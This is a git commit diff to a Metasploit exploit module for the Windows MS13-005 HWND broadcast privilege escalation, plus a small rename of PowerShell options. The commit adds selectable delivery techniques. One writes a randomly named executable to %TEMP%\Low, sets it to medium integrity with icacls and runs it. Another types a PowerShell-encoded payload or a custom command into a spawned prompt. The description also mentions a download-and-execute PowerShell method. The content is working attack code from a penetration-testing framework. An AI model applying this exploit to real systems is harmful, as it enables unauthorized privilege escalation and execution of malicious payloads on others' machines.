Add type technique

Meatballs1 · Meatballs1 · commit 234e49d9828b · 2013-07-26T23:33:16.000+01:00
diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
@@ -8,9 +8,9 @@ def initialize(info = {})
 		super
 		register_options(
 		[
-				OptBool.new('PERSIST', [true, 'Run the payload in a loop', false]),
-				OptBool.new('PSH_OLD_METHOD', [true, 'Use powershell 1.0', false]),
-				OptBool.new('RUN_WOW64', [
+				OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
+				OptBool.new('PSH::OLD_METHOD', [true, 'Use powershell 1.0', false]),
+				OptBool.new('PSH::RUN_WOW64', [
 					true,
 					'Execute powershell in 32bit compatibility mode, payloads need native arch',
 					false
diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
@@ -12,10 +12,11 @@
 class Metasploit3 < Msf::Exploit::Local
 	Rank = ExcellentRanking
 
+	include Msf::Exploit::Powershell
 	include Msf::Exploit::EXE
 	include Msf::Exploit::Remote::HttpServer
-	include Msf::Post::File
 	include Msf::Exploit::FileDropper
+	include Msf::Post::File
 
 	def initialize(info={})
 		super( update_info( info,
@@ -31,7 +32,11 @@ def initialize(info={})
 				affects versions  Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, RT.
 				But Spawning a command prompt with the shortcut key does not work in Vista so you will
 				have to check if the user is already running a command prompt and set SPAWN_PROMPT
-				false.
+				false. The WEB technique will use powershell to download and execute a powershell
+				encoded payload. The FILE technique will drop an executable to the file system, set it
+				to medium integrity and execute it. The TYPE technique will attempt to execute a
+				powershell encoded payload directly from the command line but it may take some time to
+				complete.
 			},
 			'License'	=> MSF_LICENSE,
 			'Author'	=>
@@ -61,14 +66,14 @@ def initialize(info={})
 		register_options(
 			[
 				OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]),
-				OptBool.new('FILESYSTEM', [true, 'Drop payload to filesystem and execute', false])
+				OptEnum.new('TECHNIQUE', [true, 'Delivery technique', 'WEB', ['WEB','FILE','TYPE']]),
+				OptString.new('CUSTOM_COMMAND', [false, 'Custom command to type'])
+				
 			], self.class
 		)
 
 	end
 
-	# Refactor this into Post lib with adobe_sandbox_adobecollabsync.rb
-	# Or use GetToken railgun calls?
 	def low_integrity_level?
 		tmp_dir = expand_path("%USERPROFILE%")
 		cd(tmp_dir)
@@ -115,6 +120,7 @@ def cleanup
 			vprint_status("Rehiding window...")
 			client.railgun.user32.ShowWindow(@hwin, 0)
 		end
+		super
 	end
 
 	def exploit
@@ -127,10 +133,11 @@ def exploit
 		# hopefully will be "%TEMP%/Low" (IE Low Integrity Process case) where a low
 		# integrity process can write.
 		drop_to_fs = false
-		if datastore["FILESYSTEM"]
+		if datastore['TECHNIQUE'] == 'FILE'
 			payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
 			begin
 				tmp_dir = expand_path("%TEMP%")
+				tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
 				cd(tmp_dir)
 				print_status("Trying to drop payload to #{tmp_dir}...")
 				if write_file(payload_file, generate_payload_exe)
@@ -151,10 +158,16 @@ def exploit
 		if drop_to_fs
 			command = "cd #{payload_path} && icacls #{payload_file} /setintegritylevel medium && #{payload_file}"
 			make_it(command)
+		elsif datastore['TECHNIQUE'] == 'TYPE'
+			if datastore['CUSTOM_COMMAND']
+				command = datastore['CUSTOM_COMMAND']
+			else
+				command = cmd_psh_payload(payload.encoded)
+			end
+			make_it(command)
 		else
 			super
 		end
-
 	end
 
 	def primer
